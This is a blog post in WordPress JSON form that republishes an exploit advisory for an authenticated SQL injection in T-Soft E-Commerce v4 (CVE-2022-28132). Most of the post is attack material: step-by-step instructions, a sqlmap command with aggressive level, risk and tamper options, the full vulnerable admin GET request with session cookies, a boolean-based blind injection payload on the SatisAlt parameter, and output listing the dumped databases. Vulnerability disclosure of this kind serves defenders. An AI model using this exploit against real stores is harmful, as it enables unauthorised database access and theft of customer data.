{"id":24585,"date":"2022-05-17T22:59:09","date_gmt":"2022-05-17T18:59:09","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167192\/tsoftecomm4-sql.txt"},"modified":"2022-05-28T11:22:03","modified_gmt":"2022-05-28T06:52:03","slug":"t-soft-e-commerce-4-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/t-soft-e-commerce-4-sql-injection\/","title":{"rendered":"T-Soft E-Commerce 4 SQL Injection"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: T-Soft E-Commerce 4 &#8211; SQLi (Authenticated)<br \/>\n# Exploit Author: Alperen Ergel<br \/>\n# Contact: @alpernae (IG\/TW)<br \/>\n# Software Homepage: https:\/\/www.tsoft.com.tr\/<br \/>\n# Version: v4<br \/>\n# Tested on: Kali Linux<br \/>\n# Category: WebApp<br \/>\n# Google Dork: N\/A<br \/>\n# CVE: 2022-28132<br \/>\n# Date: 18.02.2022<br \/>\n######## Description ###########################################<br \/>\n#<br \/>\n#<br \/>\n#<br \/>\n# Step-1: Log in as Admin or as a privileged user<br \/>\n# Step-2: Open Burp or ZAP and request the vulnerable path {PoC REQUEST PATH}<br \/>\n# Step-3: Capture the request and save it as .txt<br \/>\n# Step-4: Run SQLMAP with this command: 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment --random-agent'<br \/>\n# Step-5: Now you will be able to see the dbs; for more, search 'how to use sqlmap advance'<br \/>\n#<br \/>\n# Impact: An attacker can see what is in the database, which is a big impact, and can steal data&#8230;<br \/>\n#<br \/>\n#<br \/>\n#<br \/>\n######## Proof of Concept ########################################<\/p>\n<p dir=\"ltr\">========&gt;&gt;&gt; REQUEST &lt;&lt;&lt;=========<\/p>\n<p dir=\"ltr\">GET \/Y\/Moduller\/_Urun\/Json.php?_dc=1646232925144&amp;sort=kayittarihi&amp;dir=DESC&amp;AramaKelimesi=&amp;AramaKriteri=UrunAdi&amp;SatisAlt=&amp;SatisUst=<br 
\/>\n&amp;marka=&amp;model=&amp;tedarikci=&amp;AlisAlt=&amp;AlisUst=&amp;KdvAlt=&amp;KdvUst=&amp;StokAlt=&amp;StokUst=&amp;birim=&amp;extra=&amp;kategori=&amp;Kategori=&amp;gor=0&amp;ind=0&amp;yeni=0&amp;karsila=0&amp;ana=0&amp;grup=&amp;firsat=0&amp;mercek=0&amp;kdvGoster=0&amp;filtre=0&amp;video=0&amp;xml_not_update_price=0&amp;xml_not_update_stock=0&amp;multi_category_sort=0&amp;simge=&amp;desiAlt=&amp;desiUst=&amp;agirlikAlt=&amp;agirlikUst=&amp;stokBirim=&amp;FirsatBaslamaTarihiBas=&amp;FirsatBaslamaTarihiSon=&amp;FirsatBitisTarihiBas=&amp;FirsatBitisTarihiSon=&amp;UrunEklemeTarihiBas=&amp;UrunEklemeTarihiSon=&amp;havaleAlt=&amp;havaleUst=&amp;page=1&amp;start=0&amp;limit=20 HTTP\/2<br \/>\nHost: domain.com<br \/>\nCookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=<br \/>\nSec-Ch-Ua: &quot;(Not(A:Brand&quot;;v=&quot;8&quot;, &quot;Chromium&quot;;v=&quot;98&quot;<br \/>\nX-Requested-With: XMLHttpRequest<br \/>\nSec-Ch-Ua-Mobile: ?0<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.102 Safari\/537.36<br \/>\nSec-Ch-Ua-Platform: &quot;Linux&quot;<br \/>\nAccept: *\/*<br \/>\nSec-Fetch-Site: same-origin<br \/>\nSec-Fetch-Mode: cors<br \/>\nSec-Fetch-Dest: empty<br \/>\nReferer: https:\/\/domain.com\/srv\/admin\/products\/products-v2\/index<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-US,en;q=0.9<\/p>\n<p dir=\"ltr\">=============&gt; RESULTS OF THE SQLMAP &lt;==========================<\/p>\n<p dir=\"ltr\">Parameter: SatisAlt (GET)<br \/>\nType: boolean-based blind<br \/>\nTitle: AND boolean-based blind - WHERE or HAVING clause<br 
\/>\nPayload: _dc=1646232925144&amp;sort=kayittarihi&amp;dir=DESC&amp;AramaKelimesi=&amp;AramaKriteri=UrunAdi&amp;SatisAlt=&#8217; AND 1331=1331 AND &#8216;RcAU&#8217;=&#8217;RcAU&amp;SatisUst=&amp;marka=&amp;model=&amp;tedarikci=&amp;AlisAlt=&amp;AlisUst=&amp;KdvAlt=&amp;KdvUst=&amp;StokAlt=&amp;StokUst=&amp;birim=&amp;extra=&amp;kategori=&amp;Kategori=&amp;gor=0&amp;ind=0&amp;yeni=0&amp;karsila=0&amp;ana=0&amp;grup=&amp;firsat=0&amp;mercek=0&amp;kdvGoster=0&amp;filtre=0&amp;video=0&amp;xml_not_update_price=0&amp;xml_not_update_stock=0&amp;multi_category_sort=0&amp;simge=&amp;desiAlt=&amp;desiUst=&amp;agirlikAlt=&amp;agirlikUst=&amp;stokBirim=&amp;FirsatBaslamaTarihiBas=&amp;FirsatBaslamaTarihiSon=&amp;FirsatBitisTarihiBas=&amp;FirsatBitisTarihiSon=&amp;UrunEklemeTarihiBas=&amp;UrunEklemeTarihiSon=&amp;havaleAlt=&amp;havaleUst=&amp;page=1&amp;start=0&amp;limit=20<br \/>\n&#8212;<br \/>\nback-end DBMS: MySQL 5<br \/>\navailable databases [2]:<br \/>\n[*] d25082_db<br \/>\n[*] information_schema<\/p>\n<p dir=\"ltr\">[13:05:31] [INFO] GET parameter &#8216;SatisAlt&#8217; appears to be &#8216;SQLite &gt; 2.0 OR time-based blind (heavy query)&#8217; injectable<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: T-Soft E-Commerce 4 &#8211; SQLi (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG\/TW) # Software Homepage: https:\/\/www.tsoft.com.tr\/ # Version : v4 # Tested on: Kali Linux # Category: WebApp # Google Dork: N\/A # CVE: 2022-28132 # Date: 18.02.2022 ######## Description ########################################### # # # # Step-1: Login as Admin 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-24585","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24585","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=24585"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24585\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=24585"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=24585"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=24585"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}